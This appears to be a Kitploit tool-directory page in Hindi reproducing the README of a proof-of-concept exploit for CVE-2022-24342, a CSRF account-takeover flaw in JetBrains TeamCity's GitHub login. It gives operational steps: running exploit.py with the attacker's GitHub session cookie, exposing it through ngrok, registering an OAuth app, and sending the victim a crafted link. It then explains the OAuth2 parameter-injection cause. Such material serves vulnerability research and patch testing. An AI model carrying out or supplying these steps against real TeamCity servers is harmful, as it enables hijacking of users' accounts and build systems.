Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-24342 — PoC for CVE-2022-24342: GitHub प्रमाणीकरण में CSRF के माध्यम से खाता अधिग्रहण | Kitploit
उपकरण/GitHubGitHub/yuriisanin/cve-2022-24342
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणरेड टीमिंग
GitHubyuriisanin/cve-2022-24342

CVE-2022-24342

PoC for CVE-2022-24342: GitHub प्रमाणीकरण में CSRF के माध्यम से खाता अधिग्रहण

रिपॉजिटरी देखें
37724 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-24342

JetBrains TeamCity - GitHub प्रमाणीकरण में CSRF के माध्यम से खाता अधिग्रहण (PoC)

  • CVE-2022-24342
    • आवश्यकताएँ
    • उपयोग
    • यह कैसे काम करता है?
      • GitHub OAuth2: क्वेरी पैरामीटर प्रोसेसिंग क्रम
      • CVE-2022-24342: HTTP अनुरोध प्रवाह

आवश्यकताएँ

  • JetBrains TeamCity <2021.2.1
  • GitHub प्रमाणीकरण सक्षम

उपयोग

  1. लक्षित TeamCity इंस्टेंस में हमलावर के GitHub खाते से लॉगिन करने का प्रयास करें ताकि TeamCity का GitHub एप्लिकेशन अधिकृत हो सके।

  2. इंस्टॉल करें और चलाएँ:

root@kitploit:~
$ git clone https://github.com/yuriisanin/CVE-2022-24342
$ cd CVE-2022-24342/
$ pip3 install -r requirements.txt
$ python3 exploit.py -h

usage: exploit.py [-h] -s S [-p P]

optional arguments:
  -h, --help  show this help message and exit
  -s S        GitHub user session
  -p P        Uvicorn port

$ python3 exploit.py -s {attackers_github_session_cookie}

यदि आप एक्सप्लॉइट को लोकल मशीन पर चलाते हैं, तो आपको Ngrok या विकल्पों का उपयोग करने की आवश्यकता हो सकती है।

root@kitploit:~
$ ngrok http 8000
  1. GitHub OAuth2 एप्लिकेशन बनाएँ:
root@kitploit:~
homepage: "http://{exploit-host}:8000"
authorization callback url: "http://{exploit-host}:8000/callback"
  1. पीड़ित को निम्नलिखित लिंक भेजें:
root@kitploit:~
http://{exploit-host}:8000/exploit?target_host=http://{target-host}&gh_client_id={github_oauth_client_id}

डेमो:

CVE-2022-24342 डेमो

यह कैसे काम करता है?

TeamCity, OAuth2 फ़्लो के दौरान क्वेरी पैरामीटर इंजेक्शन के प्रति संवेदनशील था, जिससे एक हमलावर उपयोगकर्ता को किसी भी GitHub OAuth2 एप्लिकेशन में रीडायरेक्ट कर सकता था, एक वैध state पैरामीटर को इंटरसेप्ट कर सकता था, और पीड़ित के TeamCity खाते में किसी भी GitHub खाते को कनेक्ट कर सकता था।

यह निम्नलिखित कारणों से संभव था:

  • GitHub OAuth2 क्वेरी पैरामीटर प्रोसेसिंग क्रम
  • CVE-2022-24342: HTTP अनुरोध प्रवाह

GitHub OAuth2: क्वेरी पैरामीटर प्रोसेसिंग क्रम

github-oauth-parameters-processing

CVE-2022-24342: HTTP अनुरोध प्रवाह

requests-flow

सहायता

आप मुझे Twitter, GitHub या YouTube पर फॉलो कर सकते हैं।

टूल डाउनलोड करें